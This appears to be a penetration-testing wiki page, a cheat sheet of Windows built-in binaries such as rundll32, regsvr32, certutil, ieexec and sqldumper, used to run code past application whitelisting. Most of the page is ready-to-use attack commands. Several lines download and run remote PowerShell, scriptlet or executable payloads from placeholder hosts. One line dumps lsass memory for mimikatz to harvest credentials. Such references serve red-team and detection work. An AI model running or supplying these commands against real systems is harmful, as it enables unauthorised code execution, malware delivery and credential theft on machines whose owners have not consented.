Native Binary Tricks

From BHaFSec Pentesting Notes Wiki
Jump to: navigation, search

Credit: @Oddvarmoe https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2

forfiles

forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe 

bash.exe

bash.exe -c calc.exe

scriptrunner.exe

scriptrunner.exe -appvscript calc.exe

SyncAppvPublishingServer.exe

SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX

hh.exe

hh.exe http://www.google.com or hh.exe c:\

certutil.exe

certutil -Class scrobj.dll
certutil -Class http://WScript.Shell
certutil -urlcache -split -f http://example.com/file 
certutil.exe -URL will fetch ANY file and download it here: %userprofile%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content

rundll32.exe

rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"

regsvr32.exe

regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll

msbuild.exe

msbuild.exe pshell.xml

regsvcs.exe

regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll

regasm.exe

regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll

bginfo.exe

bginfo.exe bginfo.bgi /popup /nolicprompt

InstallUtil.exe

InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll

ieexec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

msxsl.exe

msxsl.exe customers.xml script.xsl

odbcconf.exe

odbcconf.exe /f my.rsp


sqldumper.exe

sqldumper.exe 464 0 0x0110:40  - Dump lsass to mimikatz comp. dump

https://twitter.com/countuponsec/status/910977826853068800

sqldumper.exe 540 0 0x01100

https://twitter.com/countuponsec/status/910969424215232518

pcalua.exe

pcalua.exe-a c:\datafolder\tester.bat
pcalua.exe -a \\server\payload.dll
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java

https://twitter.com/0rbz_/status/912530504871759872